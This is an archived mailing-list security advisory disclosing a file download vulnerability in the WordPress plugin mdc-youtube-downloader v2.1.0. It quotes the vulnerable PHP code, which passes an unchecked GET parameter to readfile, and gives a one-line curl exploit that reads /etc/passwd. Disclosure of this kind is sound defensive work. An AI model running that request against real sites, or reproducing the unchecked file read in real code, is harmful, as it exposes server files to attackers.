| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 06 Jul 2015 21:15:42 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Cc: fulldisclosure@...lists.org
Subject: [FD] Remote file download in Wordpress Plugin
mdc-youtube-downloader v2.1.0
Title: Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/mdc-youtube-downloader
Vendor: https://profiles.wordpress.org/mukto90/
Vendor Notified: 2015-07-01, removed vulnerable code.
Vendor Contact: n.mukto@...il.com
Description: MDC YouTube Downloader allows visitors to download YouTube videos directly from your WordPress site.
Vulnerability:
The code in mdc-youtube-downloader/includes/download.php doesn't restrict access to the local file system allowing sensitive files to be
downloaded:
$file_name = $_GET['file'];
// make sure it's a file before doing anything!
if(is_file($file_name)) {
.
.
.
switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
case 'pdf': $mime = 'application/pdf'; break;
case 'zip': $mime = 'application/zip'; break;
case 'jpeg':
case 'jpg': $mime = 'image/jpg'; break;
default: $mime = 'application/force-download';
}
header('Pragma: public'); // required
header('Expires: 0'); // no cache
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
header('Cache-Control: private',false);
header('Content-Type: '.$mime);
header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
header('Content-Transfer-Encoding: binary');
header('Content-Length: '.filesize($file_name)); // provide file size
header('Connection: close');
readfile($file_name); // push it out
exit();
CVEID: Requested, TBD.
OSVDB: TBD.
Exploit Code:
• $ curl http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists